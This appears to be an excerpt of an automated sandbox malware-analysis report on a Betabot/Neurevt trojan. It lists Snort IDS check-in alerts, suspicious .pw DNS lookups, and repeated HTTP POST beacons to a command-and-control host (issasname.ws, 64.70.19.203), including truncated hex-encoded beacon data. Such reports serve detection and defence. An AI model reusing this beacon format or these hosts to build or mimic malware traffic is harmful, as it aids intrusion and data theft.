                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49690 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49690 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49692 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49692 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49693 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49693 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:50295 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49694 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49694 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49694 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:51441 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49695 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49695 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49695 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:65323 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49696 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49696 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49696 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:55039 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49697 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49697 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49697 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:56682 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49698 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49698 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:56263 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49699 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49699 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49699 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:52688 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49700 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49700 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49700 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:58472 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49701 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49701 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49701 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:50902 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49702 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49702 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49702 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:53555 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49703 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49703 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49703 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:54585 -> 8.8.8.8:53
                      Source: TrafficSnort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49704 -> 64.70.19.203:80
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49704 -> 64.70.19.203:80
                      Found C&C like URL pattern
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=9504479 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1062Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=70 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1018Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=1637135 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1025Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1032Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=7277094 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1062Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1050Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1022Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=4981026 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1086Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1025Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1068Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=69 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1048Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=127 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1054Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1042Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=33 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1008Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?pid=631 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1054Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=4923518 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1010Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?pid=668 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1024Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8413675 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1050Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1044Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8088252 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1024Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8088252 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1024Cache-Control: no-cacheData Raw: 71 6d 69 65 75 71 6d 69 3d 30 36 34 32 32 42 33 42 32 32 35 45 32 43 43 36 45 36 34 33 38 44 42 32 39 45 46 42 32 32 35 43 26 6f 69 63 77 6b 65 3d 31 33 37 38 36 35 33 38 26 73 71 6f 6d 3d 37 42 38 34 36 41 43 33 30 46 42 41 33 41 44 30 44 41 43 41 42 35 37 39 33 36 35 35 37 44 36 45 35 33 36 37 45 43 39 42 37 38 44 38 41 45 38 33 41 30 33 39 32 42 39 39 45 43 34 46 34 32 34 33 38 39 33 43 32 43 33 34 37 38 35 33 38 42 32 32 39 46 46 46 31 39 39 33 35 31 32 45 30 46 45 37 33 33 31 33 31 45 35 42 43 36 42 43 32 45 35 44 35 35 35 35 30 41 44 45 45 38 39 44 41 31 44 46 39 35 31 30 39 46 37 34 38 33 30 39 37 44 44 38 39 45 31 31 39 33 37 37 38 38 32 44 37 39 39 41 45 44 35 43 33 42 31 35 43 42 34 43 34 30 31 46 34 31 41 31 42 32 43 43 43 33 32 35 45 38 44 34 35 36 35 37 45 39 36 35 38 42 35 30 37 43 33 31 37 32 44 34 30 34 39 35 37 41 41 35 32 44 31 44 46 36 37 35 45 33 46 41 41 34 30 34 30 33 33 43 46 30 32 45 39 32 35 39 45 33 45 30 39 31 30 35 32 45 44 36 39 41 37 39 45 37 44 42 44 33 39 39 39 45 37 45 37 33 44 43 34 33 39 46 35 33 30 30 37 38 41 43 31 36 41 37 37 45 30 41 31 33 31 35 44 33 45 31 31 44 37 30 44 41 34 46 46 37 35 31 37 45 42 44 35 38 46 44 26 75 75 75 75 6f 6f 31 3d 36 31 46 30 34 42 43 32 37 45 46 30 32 31 43 32 35 30 46 30 31 45 43 32 34 35 46 30 30 33 43 32 34 33 46 30 31 43 43 32 36 36 46 30 31 30 43 32 35 36 46 30 31 30 43 32 37 45 46 30 32 30 43 32 35 37 46 30 31 38 43 32 34 31 46 30 31 41 43 32 35 36 46 30 31 38 43 32 34 46 46 30 31 34 43 32 30 32 46 30 34 39 43 32 30 43 46 30 34 34 43 32 30 43 46 30 34 30 43 32 37 45 46 30 30 38 43 32 35 34 46 30 31 46 43 32 34 37 46 30 30 32 43 32 34 45 46 30 31 39 43 32 35 32 46 30 31 32 43 32 30 43 46 30 31 34 43 32 35 41 46 30 31 34 43 32 26 75 75 75 75 6f 6f 32 3d 34 42 46 30 31 34 43 32 35 41 46 30 30 31 43 32 34 45 46 30 31 45 43 32 35 30 46 30 31 34 43 32 30 43 46 30 31 34 43 32 35 41 46 30 31 34 43 32 26 75 75 75 75 6f 6f 33 3d 36 36 46 30 33 34 43 32 37 31 46 30 33 41 43 32 37 36 46 30 33 45 43 32 37 32 46 30 35 43 43 32 31 35 46 30 34 30 43 32 31 34 46 30 32 35 43 32 31 35 46 30 34 36 43 32 31 33 46 30 32 44 43 32 34 33 46 30 31 44 43 32 34 34 46 30 31 45 43 32 34 43 46 30 30 32 43 32 26 75 75 75 75 6f 6f 34 3d 36 42 46 30 31 46 43 32 35 36 46 30 31 34 43 32 34 45 46 30 35 39 43 32 37 30 46 30 35 38 43 32 30 32 46 30 33 32 43 32 34 44 46 30 30 33 43 32 34 37 46 30 35 39 43 32 37 36 46 30 33 43 43 32 30 42 46 30 34 33 43 32 30 32 46 30 33 32 43 32 37 32 46 30 32 34 43 32 30 32 46 30 34 37 43 32 31 34 46 30 34 31 43 32 31 32 46 30 35 31 43 32 36 32 46 30 35 31 43 32 31 30 46 30 35 46 43 32 31 36 46 30 34 31 43 32 30 32 46 30 33 36 43 32 36 41 46 30 30 42 43 32 26 75 75 75 75 6f 6f 35 3d 36 46 46 30 31 38 43 32 34 31 46 30 30 33 43 3
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1052Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1048Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=3966837 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1066Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1052Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1018Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=1465544 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1042Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1062Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=38 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1040Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1018Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?pid=925 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1046Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=575573 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1078Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1078Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8314615 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1040Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=5889637 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1056Cache-Control: no-cache
                      Contains functionality to check if Internet connection is working
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02870D19 closesocket, update.microsoft.com4_2_02870D19
                      Source: Joe Sandbox ViewASN Name: CENTURYLINK-LEGACY-SAVVISUS CENTURYLINK-LEGACY-SAVVISUS
                      Source: Joe Sandbox ViewIP Address: 64.70.19.203 64.70.19.203
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=9504479 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1062Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=70 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1018Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=1637135 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1025Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1032Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=7277094 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1062Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1050Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1022Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=4981026 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1086Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1025Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1068Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=69 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1048Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=127 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1054Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1042Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=33 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1008Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?pid=631 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1054Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=4923518 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1010Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?pid=668 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1024Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8413675 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1050Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1044Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8088252 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1024Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8088252 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1024Cache-Control: no-cacheData Raw: 71 6d 69 65 75 71 6d 69 3d 30 36 34 32 32 42 33 42 32 32 35 45 32 43 43 36 45 36 34 33 38 44 42 32 39 45 46 42 32 32 35 43 26 6f 69 63 77 6b 65 3d 31 33 37 38 36 35 33 38 26 73 71 6f 6d 3d 37 42 38 34 36 41 43 33 30 46 42 41 33 41 44 30 44 41 43 41 42 35 37 39 33 36 35 35 37 44 36 45 35 33 36 37 45 43 39 42 37 38 44 38 41 45 38 33 41 30 33 39 32 42 39 39 45 43 34 46 34 32 34 33 38 39 33 43 32 43 33 34 37 38 35 33 38 42 32 32 39 46 46 46 31 39 39 33 35 31 32 45 30 46 45 37 33 33 31 33 31 45 35 42 43 36 42 43 32 45 35 44 35 35 35 35 30 41 44 45 45 38 39 44 41 31 44 46 39 35 31 30 39 46 37 34 38 33 30 39 37 44 44 38 39 45 31 31 39 33 37 37 38 38 32 44 37 39 39 41 45 44 35 43 33 42 31 35 43 42 34 43 34 30 31 46 34 31 41 31 42 32 43 43 43 33 32 35 45 38 44 34 35 36 35 37 45 39 36 35 38 42 35 30 37 43 33 31 37 32 44 34 30 34 39 35 37 41 41 35 32 44 31 44 46 36 37 35 45 33 46 41 41 34 30 34 30 33 33 43 46 30 32 45 39 32 35 39 45 33 45 30 39 31 30 35 32 45 44 36 39 41 37 39 45 37 44 42 44 33 39 39 39 45 37 45 37 33 44 43 34 33 39 46 35 33 30 30 37 38 41 43 31 36 41 37 37 45 30 41 31 33 31 35 44 33 45 31 31 44 37 30 44 41 34 46 46 37 35 31 37 45 42 44 35 38 46 44 26 75 75 75 75 6f 6f 31 3d 36 31 46 30 34 42 43 32 37 45 46 30 32 31 43 32 35 30 46 30 31 45 43 32 34 35 46 30 30 33 43 32 34 33 46 30 31 43 43 32 36 36 46 30 31 30 43 32 35 36 46 30 31 30 43 32 37 45 46 30 32 30 43 32 35 37 46 30 31 38 43 32 34 31 46 30 31 41 43 32 35 36 46 30 31 38 43 32 34 46 46 30 31 34 43 32 30 32 46 30 34 39 43 32 30 43 46 30 34 34 43 32 30 43 46 30 34 30 43 32 37 45 46 30 30 38 43 32 35 34 46 30 31 46 43 32 34 37 46 30 30 32 43 32 34 45 46 30 31 39 43 32 35 32 46 30 31 32 43 32 30 43 46 30 31 34 43 32 35 41 46 30 31 34 43 32 26 75 75 75 75 6f 6f 32 3d 34 42 46 30 31 34 43 32 35 41 46 30 30 31 43 32 34 45 46 30 31 45 43 32 35 30 46 30 31 34 43 32 30 43 46 30 31 34 43 32 35 41 46 30 31 34 43 32 26 75 75 75 75 